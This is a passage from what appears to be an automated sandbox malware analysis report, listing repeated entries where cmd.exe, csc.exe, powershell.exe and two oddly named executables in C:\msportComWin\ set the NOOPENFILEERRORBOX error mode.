                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
